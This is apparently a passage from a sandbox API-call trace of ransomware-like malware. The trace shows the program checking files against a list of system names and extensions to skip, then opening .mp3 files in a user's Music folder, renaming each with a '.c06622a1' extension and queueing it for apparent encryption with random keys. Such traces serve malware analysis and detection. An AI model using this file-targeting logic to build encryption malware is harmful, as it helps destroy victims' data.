(_Str1="desktop.ini", _Str2="CZr_rmhXD6Ex6.mp3") returned 1 [0160.016] wcslen (_String="desktop.ini") returned 0xb [0160.016] _wcsicmp (_Str1="iconcache.db", _Str2="CZr_rmhXD6Ex6.mp3") returned 6 [0160.016] wcslen (_String="iconcache.db") returned 0xc [0160.016] _wcsicmp (_Str1="ntldr", _Str2="CZr_rmhXD6Ex6.mp3") returned 11 [0160.016] wcslen (_String="ntldr") returned 0x5 [0160.016] _wcsicmp (_Str1="ntuser.dat", _Str2="CZr_rmhXD6Ex6.mp3") returned 11 [0160.016] wcslen (_String="ntuser.dat") returned 0xa [0160.016] _wcsicmp (_Str1="ntuser.dat.log", _Str2="CZr_rmhXD6Ex6.mp3") returned 11 [0160.016] wcslen (_String="ntuser.dat.log") returned 0xe [0160.016] _wcsicmp (_Str1="ntuser.ini", _Str2="CZr_rmhXD6Ex6.mp3") returned 11 [0160.016] wcslen (_String="ntuser.ini") returned 0xa [0160.016] _wcsicmp (_Str1="thumbs.db", _Str2="CZr_rmhXD6Ex6.mp3") returned 17 [0160.016] wcslen (_String="thumbs.db") returned 0x9 [0160.016] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.016] wcslen (_String="386") returned 0x3 [0160.016] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.016] wcslen (_String="adv") returned 0x3 [0160.016] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.016] wcslen (_String="ani") returned 0x3 [0160.016] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.016] wcslen (_String="bat") returned 0x3 [0160.016] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.016] wcslen (_String="bin") returned 0x3 [0160.016] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.016] wcslen (_String="cab") returned 0x3 [0160.016] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.016] wcslen (_String="cmd") returned 0x3 [0160.017] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.017] wcslen (_String="com") returned 0x3 [0160.017] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.017] wcslen (_String="cpl") returned 0x3 [0160.017] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.017] wcslen (_String="cur") returned 0x3 [0160.017] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.017] wcslen (_String="deskthemepack") returned 0xd [0160.017] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.017] wcslen (_String="diagcab") returned 0x7 [0160.017] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.017] wcslen (_String="diagcfg") returned 0x7 [0160.017] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.017] wcslen (_String="diagpkg") returned 0x7 [0160.017] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.017] wcslen (_String="dll") returned 0x3 [0160.017] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.017] wcslen (_String="drv") returned 0x3 [0160.017] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.017] wcslen (_String="exe") returned 0x3 [0160.017] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.017] wcslen (_String="hlp") returned 0x3 [0160.017] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.017] wcslen (_String="icl") returned 0x3 [0160.017] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.017] wcslen (_String="icns") returned 0x4 [0160.017] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.017] wcslen (_String="ico") returned 0x3 [0160.017] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.017] wcslen (_String="ics") returned 0x3 [0160.017] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.017] wcslen (_String="idx") returned 0x3 [0160.017] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.017] wcslen (_String="ldf") returned 0x3 [0160.017] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.017] wcslen (_String="lnk") returned 0x3 [0160.018] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.018] wcslen (_String="mod") returned 0x3 [0160.018] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.018] wcslen (_String="mpa") returned 0x3 [0160.018] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.018] wcslen (_String="msc") returned 0x3 [0160.018] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.018] wcslen (_String="msp") returned 0x3 [0160.018] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.018] wcslen (_String="msstyles") returned 0x8 [0160.018] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.018] wcslen (_String="msu") returned 0x3 [0160.018] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.018] wcslen (_String="nls") returned 0x3 [0160.018] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.018] wcslen (_String="nomedia") returned 0x7 [0160.018] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.018] wcslen (_String="ocx") returned 0x3 [0160.018] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.018] wcslen (_String="prf") returned 0x3 [0160.018] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.018] wcslen (_String="ps1") returned 0x3 [0160.018] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.018] wcslen (_String="rom") returned 0x3 [0160.018] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.018] wcslen (_String="rtp") returned 0x3 [0160.018] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.018] wcslen (_String="scr") returned 0x3 [0160.018] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.018] wcslen (_String="shs") returned 0x3 [0160.018] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.018] wcslen (_String="spl") returned 0x3 [0160.018] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.018] wcslen (_String="sys") returned 0x3 [0160.018] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.018] wcslen (_String="theme") returned 0x5 [0160.018] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.018] wcslen (_String="themepack") returned 0x9 [0160.019] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.019] wcslen (_String="wpx") returned 0x3 [0160.019] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.019] wcslen (_String="lock") returned 0x4 [0160.019] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.019] wcslen (_String="key") returned 0x3 [0160.019] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.019] wcslen (_String="hta") returned 0x3 [0160.019] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.019] wcslen (_String="msi") returned 0x3 [0160.019] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.019] wcslen (_String="pdb") returned 0x3 [0160.019] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.019] wcslen (_String="sqlite") returned 0x6 [0160.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 0x10 [0160.019] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.019] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" [0160.019] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned 0x3f [0160.019] wcscpy (in: _Dest=0x32a2110, _Source="CZr_rmhXD6Ex6.mp3" | out: _Dest="CZr_rmhXD6Ex6.mp3") returned="CZr_rmhXD6Ex6.mp3" [0160.019] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3", dwFileAttributes=0x80) returned 1 [0160.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\czr_rmhxd6ex6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0160.020] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.020] ReadFile (in: hFile=0x1c, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.020] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x9041f049 [0160.021] RtlComputeCrc32 (PartialCrc=0xf049, Buffer=0x32e4a4, Length=0x80) returned 0xaf0dc054 [0160.021] RtlComputeCrc32 (PartialCrc=0xc054, Buffer=0x32e4a4, Length=0x80) returned 0x61854f3c [0160.021] RtlComputeCrc32 (PartialCrc=0x4f3c, Buffer=0x32e4a4, Length=0x80) returned 0xeaa7c13c [0160.021] RtlComputeCrc32 (PartialCrc=0xc13c, Buffer=0x32e4a4, Length=0x80) returned 0x1c57765e [0160.021] CloseHandle (hObject=0x1c) returned 1 [0160.021] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.021] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3" [0160.021] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3") returned 0x51 [0160.021] wcscpy (in: _Dest=0x32b213a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.021] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\czr_rmhxd6ex6.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\czr_rmhxd6ex6.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\CZr_rmhXD6Ex6.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\czr_rmhxd6ex6.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0160.032] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.032] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24fa3892 [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33b6ce3a [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d67fdb [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31bc7e13 [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60d143d3 [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3828cc8c [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6588d0c7 [0160.039] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32acf988 [0160.042] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x2c333dd0 [0160.042] RtlComputeCrc32 (PartialCrc=0x3dd0, Buffer=0x3510094, Length=0x80) returned 0x18d31ba8 [0160.042] RtlComputeCrc32 (PartialCrc=0x1ba8, Buffer=0x3510094, Length=0x80) returned 0x7c3a9059 [0160.042] RtlComputeCrc32 (PartialCrc=0x9059, Buffer=0x3510094, Length=0x80) returned 0xfc00f8b5 [0160.042] RtlComputeCrc32 (PartialCrc=0xf8b5, Buffer=0x3510094, Length=0x80) returned 0x8a86bf3f [0160.042] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0160.042] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.042] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.042] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b7f7970, ftCreationTime.dwHighDateTime=0x1d5e6d1, ftLastAccessTime.dwLowDateTime=0xba9c920, ftLastAccessTime.dwHighDateTime=0x1d5e67b, ftLastWriteTime.dwLowDateTime=0xba9c920, ftLastWriteTime.dwHighDateTime=0x1d5e67b, nFileSizeHigh=0x0, nFileSizeLow=0x186f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J023_px.mp3", cAlternateFileName="")) returned 1 [0160.042] _wcsicmp (_Str1="J023_px.mp3", _Str2="README.c06622a1.TXT") returned -8 [0160.042] wcsstr (_Str="J023_px.mp3", _SubStr="README") returned 0x0 [0160.042] _wcsicmp (_Str1="autorun.inf", _Str2="J023_px.mp3") returned -9 [0160.042] wcslen (_String="autorun.inf") returned 0xb [0160.042] _wcsicmp (_Str1="boot.ini", _Str2="J023_px.mp3") returned -8 [0160.042] wcslen (_String="boot.ini") returned 0x8 [0160.042] _wcsicmp (_Str1="bootfont.bin", _Str2="J023_px.mp3") returned -8 [0160.042] wcslen (_String="bootfont.bin") returned 0xc [0160.042] _wcsicmp (_Str1="bootsect.bak", _Str2="J023_px.mp3") returned -8 [0160.042] wcslen (_String="bootsect.bak") returned 0xc [0160.042] _wcsicmp (_Str1="desktop.ini", _Str2="J023_px.mp3") returned -6 [0160.042] wcslen (_String="desktop.ini") returned 0xb [0160.042] _wcsicmp (_Str1="iconcache.db", _Str2="J023_px.mp3") returned -1 [0160.043] wcslen (_String="iconcache.db") returned 0xc [0160.043] _wcsicmp (_Str1="ntldr", _Str2="J023_px.mp3") returned 4 [0160.043] wcslen (_String="ntldr") returned 0x5 [0160.043] _wcsicmp (_Str1="ntuser.dat", _Str2="J023_px.mp3") returned 4 [0160.043] wcslen (_String="ntuser.dat") returned 0xa [0160.043] _wcsicmp (_Str1="ntuser.dat.log", _Str2="J023_px.mp3") returned 4 [0160.043] wcslen (_String="ntuser.dat.log") returned 0xe [0160.043] _wcsicmp (_Str1="ntuser.ini", _Str2="J023_px.mp3") returned 4 [0160.043] wcslen (_String="ntuser.ini") returned 0xa [0160.043] _wcsicmp (_Str1="thumbs.db", _Str2="J023_px.mp3") returned 10 [0160.043] wcslen (_String="thumbs.db") returned 0x9 [0160.043] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.043] wcslen (_String="386") returned 0x3 [0160.043] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.043] wcslen (_String="adv") returned 0x3 [0160.043] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.043] wcslen (_String="ani") returned 0x3 [0160.043] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.043] wcslen (_String="bat") returned 0x3 [0160.043] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.043] wcslen (_String="bin") returned 0x3 [0160.043] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.043] wcslen (_String="cab") returned 0x3 [0160.043] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.043] wcslen (_String="cmd") returned 0x3 [0160.043] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.043] wcslen (_String="com") returned 0x3 [0160.043] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.043] wcslen (_String="cpl") returned 0x3 [0160.043] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.043] wcslen (_String="cur") returned 0x3 [0160.043] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.043] wcslen (_String="deskthemepack") returned 0xd [0160.043] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.043] wcslen (_String="diagcab") returned 0x7 [0160.043] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.043] wcslen (_String="diagcfg") returned 0x7 [0160.044] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.044] wcslen (_String="diagpkg") returned 0x7 [0160.044] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.044] wcslen (_String="dll") returned 0x3 [0160.044] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.044] wcslen (_String="drv") returned 0x3 [0160.044] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.044] wcslen (_String="exe") returned 0x3 [0160.044] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.044] wcslen (_String="hlp") returned 0x3 [0160.044] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.044] wcslen (_String="icl") returned 0x3 [0160.044] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.044] wcslen (_String="icns") returned 0x4 [0160.044] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.044] wcslen (_String="ico") returned 0x3 [0160.044] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.044] wcslen (_String="ics") returned 0x3 [0160.044] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.044] wcslen (_String="idx") returned 0x3 [0160.044] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.044] wcslen (_String="ldf") returned 0x3 [0160.044] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.044] wcslen (_String="lnk") returned 0x3 [0160.044] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.044] wcslen (_String="mod") returned 0x3 [0160.044] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.044] wcslen (_String="mpa") returned 0x3 [0160.044] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.044] wcslen (_String="msc") returned 0x3 [0160.044] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.044] wcslen (_String="msp") returned 0x3 [0160.044] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.044] wcslen (_String="msstyles") returned 0x8 [0160.044] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.044] wcslen (_String="msu") returned 0x3 [0160.044] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.044] wcslen (_String="nls") returned 0x3 [0160.045] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.045] wcslen (_String="nomedia") returned 0x7 [0160.045] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.045] wcslen (_String="ocx") returned 0x3 [0160.045] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.045] wcslen (_String="prf") returned 0x3 [0160.045] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.045] wcslen (_String="ps1") returned 0x3 [0160.045] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.045] wcslen (_String="rom") returned 0x3 [0160.045] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.045] wcslen (_String="rtp") returned 0x3 [0160.045] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.045] wcslen (_String="scr") returned 0x3 [0160.045] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.045] wcslen (_String="shs") returned 0x3 [0160.045] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.045] wcslen (_String="spl") returned 0x3 [0160.045] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.045] wcslen (_String="sys") returned 0x3 [0160.045] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.045] wcslen (_String="theme") returned 0x5 [0160.045] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.045] wcslen (_String="themepack") returned 0x9 [0160.045] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.045] wcslen (_String="wpx") returned 0x3 [0160.045] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.045] wcslen (_String="lock") returned 0x4 [0160.045] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.045] wcslen (_String="key") returned 0x3 [0160.045] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.045] wcslen (_String="hta") returned 0x3 [0160.045] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.045] wcslen (_String="msi") returned 0x3 [0160.046] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.046] wcslen (_String="pdb") returned 0x3 [0160.046] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.046] wcslen (_String="sqlite") returned 0x6 [0160.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 0x10 [0160.046] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.046] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" [0160.046] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned 0x3f [0160.046] wcscpy (in: _Dest=0x32a2110, _Source="J023_px.mp3" | out: _Dest="J023_px.mp3") returned="J023_px.mp3" [0160.046] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3", dwFileAttributes=0x80) returned 1 [0160.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\j023_px.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0160.046] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.046] ReadFile (in: hFile=0x1e0, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.047] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x1945a6cd [0160.047] RtlComputeCrc32 (PartialCrc=0xa6cd, Buffer=0x32e4a4, Length=0x80) returned 0x4e9281a0 [0160.047] RtlComputeCrc32 (PartialCrc=0x81a0, Buffer=0x32e4a4, Length=0x80) returned 0x1876feb5 [0160.047] RtlComputeCrc32 (PartialCrc=0xfeb5, Buffer=0x32e4a4, Length=0x80) returned 0x85405ab3 [0160.047] RtlComputeCrc32 (PartialCrc=0x5ab3, Buffer=0x32e4a4, Length=0x80) returned 0x651a41dc [0160.047] CloseHandle (hObject=0x1e0) returned 1 [0160.047] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.047] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3" [0160.047] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3") returned 0x4b [0160.048] wcscpy (in: _Dest=0x32b212e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.048] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\j023_px.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\j023_px.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\J023_px.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\j023_px.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0160.050] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.050] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0160.057] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76fe4ca7 [0160.057] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31493ae0 [0160.058] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d257fa8 [0160.058] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4131380f [0160.058] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4b1be7fc [0160.058] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8d0199c [0160.058] 